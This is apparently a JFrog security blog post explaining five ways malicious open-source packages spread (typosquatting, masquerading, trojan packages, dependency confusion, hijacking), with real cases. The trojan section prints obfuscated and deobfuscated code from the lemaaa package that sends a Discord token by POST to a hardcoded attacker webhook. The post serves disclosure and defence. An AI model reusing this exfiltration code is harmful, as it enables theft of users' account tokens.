Five Examples of Infection Methods Attackers Use to Spread Malicious Packages

Malicious Software Packages Series Part 2 of 4: This is how JFrog’s security researchers found these malicious code attacks

Welcome to the second post in our series on Malicious Software Packages. This post focuses on the infection methods attackers use to spread malicious packages, and how the JFrog Security research team unveiled them.

If you missed the first blog, here are some key takeaways:

  • Third-party software packages contain vulnerabilities or malicious code delivered through the software supply chain.
  • In a software supply chain attack, an adversary slips malicious code or an entire malicious component into a trusted piece of software, affecting the consumers of this software in the supply chain.
  • Attacking a supply chain, using malicious open source packages, has become a popular technique for attackers in the last few years, mainly because of the high distribution potential of the attack and the technical ease.

Note: Many of the following software supply chain attack examples are based on actual data and malicious software packages identified and disclosed by the JFrog Security research team.

Review these infection methods and find out how JFrog’s security researchers discovered and disclosed them.

5 Infection Methods and Examples

1. Typosquatting

What is the typosquatting infection method?

Typosquatting is the practice of obtaining (or squatting) a famous name with a slight typographical error. This practice applies to many resources like web pages, executable names, and software package names.

Let’s say you buy the domain name gogle.com instead of the legitimate domain google.com, hoping that users will make typing errors and reach the illegitimate domain, used for any attack payload, such as phishing and code injection attacks. Attacks like this happen on the web all the time. The same thing happens now with malicious packages, where attackers register them with names that are similar to popular packages names, but with a small typo change. Attackers register these malicious packages in popular packages repositories such as NPM and PyPI hoping that developers will occasionally make typing errors and install them.

In a trend that we are seeing recently, some maintainers and developers take an active role and reserve “Typosquatting-prone” names for their projects, to prevent attackers from taking control of them. In a similar way, Google registered gogle.com domain specifically, and so if you browse to gogle.com you will be redirected to google.com. Try it!

Typosquatting discovery: mplatlib package

JFrog’s Security Research team detected the following typosquatting infection using automated heuristic scanners that detect malicious activity in open-source packages. More on that in the fourth part of this blog series.

The scanners found that the package name mplatlib was malicious due to a code obfuscation technique that was used in it. It is also noticeable that its name is very similar to the legit package mplotlab:

In the console log example below, a simple typo installed the malicious package mplatlib at the time of research:

The existence of mplatlib package and other malicious packages were reported to PyPI and removed.

2. Masquerading

What is the masquerading infection method?

Masquerading is when malware authors, or the attackers, publish a malicious package that impersonates a known package. They duplicate both the code and the metadata of the original project, which they want to impersonate, and add a small piece of malicious code to this duplicate, essentially building trojan packages.

This infection method is similar to the typosquatting infection method in how it uses a name identical to the legitimate package. Still, the difference is that they aim to deceive developers through similarity to the legitimate package rather than seeking accidental use due to typos.

Masquerading discovery: markedjs package

In February of this year, the JFrog Security research team uncovered the malicious package markedjs.

The original name and metadata of the markedjs malicious package were copied from the legitimate and popular marked package, making the names indistinguishable.

The URL of the repository, homepage, and description are the same as can be seen in this comparison from the NPM repository:

The legitimate marked package:

The malicious package markedjs:

When comparing the malicious package (i.e., markedjs) code with the original package (i.e., marked) code, the only difference from the original package is one line in a single file marked in black:

The long line marked in black in the example above does not contain readable code, and it is placed in legitimate and legible lines, making it difficult to find this line without automated scanning or diffing tools. This line is the obfuscated malicious code, the only addition to the original legitimate package, making this modification functional yet malicious.

3. Trojan Package

What is the trojan package infection method?

In the trojan package infection method, the attacker publishes a fully functional library but hides malicious code in it. Similar to masquerading techniques, malicious code is usually small or obfuscated. Therefore, it’s hard to detect and differentiate between legitimate functionality of the package.

Trojan package discovery: lemaaa

JFrog’s scanners caught the malicious trojan package lemaaa and featured it in our published research in February this year.

This package is intended for use by malware authors to hack Discord accounts.

Discord is a communication application with hundreds of millions of registered users that allows for voice and video calls, text messaging, and media file sharing. The identity of a user in the Discord network is presented in a string called a Discord token, a set of letters and numbers that act as an authorization code to access Discord’s servers. A user’s credentials can effectively give the attacker full access to the Discord account.

The lemaaa library (example pictured below) is a fully functional, published library used by attackers to steal Discord tokens. The interesting story here is that the trojan code in this package is aimed at stealing Discord tokens from any attacker that uses this library. When the utility functions of the library are used, the trojan code will hijack the secret Discord token given to it, so basically this malicious package attacks the attackers that want to use the library to steal tokens.

The following code is the obfuscated malicious code that contains a payload that hijacks the supplied Discord token and sends it to a hardcoded web URL, essentially sending the token to the attacker-controlled site.

Obfuscated Code:

function _0xf28e(){const 
_0x159601=['DELETE','https://discord.com/api/v8/users/@me
','11317570ajQRNl','application/json','token','random',',\x20\x22nitro_boost\x22:\x20','false',
'https://discord.com/api/v9/users/@me/mfa/totp/disable','https://discord.com/api/v8/guilds/
','last_4','@gmail.com','true','1315DTGoNg',',\x20\x22early_verified_bot_developer\x
22:\x20','\x22,\x20\x22new_password\x22:\x20\x22','map','14370OOLNxq','There\x20is\x20no\x20bots',...

After deobfuscating this code, we can see that the utility function removeAllFriends() uses an HTTP POST request to send the supplied token to the attacker-controlled website.

Deobfuscated Code:

async function removeAllFriends(token) {
    ...
    var _0x3d283a = await _0x1aa523['json'](),
        malicious_webhook = 'https://canary.discord.com/api/webhooks/884196214302703676/PHJ1-GGrEOV7Zwz2RodFDpazJXmH6OnM60TNEX4RZ-VT-qW5sUUu-dZHCb3s5vApWHHz';
    await fetch(malicious_webhook, {
        'method': 'POST',
        'headers': {
            'Content-Type': 'application/json'
        },
        'body': JSON['stringify']({
            'content': '' + token
        })

Since this function is in a malware library, it is not exceptional that some code is obfuscated. Therefore, malware authors might trust it.

4. Dependency Confusion

What is the dependency confusion infection method?

Dependency confusion exploits a vulnerability in the way that many package managers download dependencies during a build process.

In the dependency confusion method, the attacker uses specific package names of internal packages of a target and publishes a malicious package on an external public repository with the exact name. The attacker then assigns a very high version number to this published package. Most default package managers prefer downloading the external malicious package because of its high version number rather than downloading a low version from the legitimate internal repository.

We can see in the following screenshot an example of a malicious package, created as part of a research that was published last year by a security researcher named Alex Birsan.

What we can see in the below screenshot is a publicly-available package in PyPI with a name that looks like an internal package of Netflix and a very high version number.

With this attack, Birsan successfully exploited Netflix, as well as Apple and Microsoft, by making their servers download the malicious external package instead of the legitimate internal one.

Dependency confusion attack discovery: mrg-message-broker 9998.987.376

Research published by the JFrog Security research team in December 2021 identified a malicious package that spread using a dependency confusion attack.

JFrog’s security researchers detected this attack (example pictured below) quickly because of the unbelievably high version number, which is generally not used in standard product versioning. The payload of this malicious package was an environment variable stealer; we will show deep analysis of this kind of payload and others in the next part in this malicious packages blog series.

5. Software Package Hijacking

What is the software package hijacking infection method?

The last infection method is software package hijacking.

This method involves taking over a legitimate known package and pushing malicious code into it. While this is not an easy task, it’s very effective because it can take advantage of the popularity of available packages for a high infection rate.

Software packages hijacking is usually performed by hacking maintainers’ and developers’ accounts or by injecting hidden or obfuscated malicious code as part of a legitimate code contribution to an open-source project.

Software hijacking discovery: ua-parser-js

In October 2021, a known and legitimate package was attacked and hijacked by taking over maintainers’ accounts and pushing malicious code to several versions of the package. Below, you can view this hijacked package, called ua-parser-js (example below).

Source: NPMJS

This popular package has more than 1.5 billion downloads to date. What’s notable here is that the malicious code injected into this package was the same as in another malicious package originally masquerading as the legitimate ua-parser-js package.

Below is the announcement by the developer of the ua-parser-js package saying that they believe someone hijacked and published malicious versions of it:

“I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware,” announced Faisal Salman, the developer behind “ua-parser-js.”

After this disclosure and other similar incidents at that time, Github enforced two-factor authentication for maintainers and administrators of popular npm packages.

Software hijacking discovery: Colors and Faker incident

Software package hijacking can happen not only by malicious third parties but also by the developers and maintainers of the projects themselves, like in the notable case of Colors and Faker open source packages. The Colors and Faker NPM packages are very popular with Node.js developers. Colors allows developers to add styles, fonts, and colors to the Node.js console, and Faker allows them to generate data for testing purposes during development. These two packages were developed by the same author and they are highly popular with millions of weekly downloads. Early this year, this author sabotaged the two packages to protest using their code by large corporations that do not give back to the open source community. They added an infinite loop into their code which bricked thousands of projects that depend on them just for protesting corporations. By performing a single modification to the package code, many companies were affected by the malicious code that was added and bricked their products.

Software hijacking discovery: Hijacking with phishing attacks

In August 2022, the PyPI team detected and reported on a phishing campaign targeting PyPI developers. The PyPI team mentioned that this was the first known phishing attack against the PyPI repository. In this attack, the attackers created a phishing website that requires PyPI users to provide their credentials, as part of a mandatory “validation” process being implemented:

The Phishing website. Image Source: PyPI on Twitter

PyPI team has detected and removed three malicious releases of legitimate packages that were hacked in this attack and urged developers to configure Two-factor authentication to their user accounts to avoid this kind of phishing attacks. The Google Open Source Security Team, a sponsor of the Python Software Foundation, has also provided a limited number of 2FA security keys to critical PyPI project maintainers.

Software hijacking discovery: Hijacking through domain takeover

Hijacking software packages by taking over maintainers’ accounts is not only limited to phishing attacks and credentials theft. Attackers become sophisticated as time goes by, and in May this year, JFrog Security researchers published a thorough analysis of a new hijacking method using expired domain takeovers. In this method, attackers register expired domains of email addresses of package maintainers, recreate the email addresses in the registered domain, initiate a password recovery process, and take control of the maintainer’s account. The research was conducted on the NPM repository, where more than 3,000 packages were found vulnerable due to expired maintainers’ email domain names. This is the last trend in malicious packages’ infection methods and we see a rise in those attacks in the past months, so expect to see more of this soon.

As you can probably tell, these infection methods are serious for DevOps teams and consumers.

Now that we’re at the end of our post on the five infection methods used by attackers to spread malicious packages, let’s discuss the payload phase in the aftermath of an attack in the “Malicious Software Packages” series. We’ll analyze payloads used in malicious software packages and how attackers hide them in code using obfuscation techniques and give code examples from attacks discovered by the JFrog Security research team.

Remember, there’s always more to learn. Register for JFrog’s upcoming webinars.

This educational series has been adapted from the webinar Identifying and Avoiding Malicious Packages, a technical showcase of the different types of malicious packages prevalent today in the PyPI (Python) and npm (Node.js) package repositories.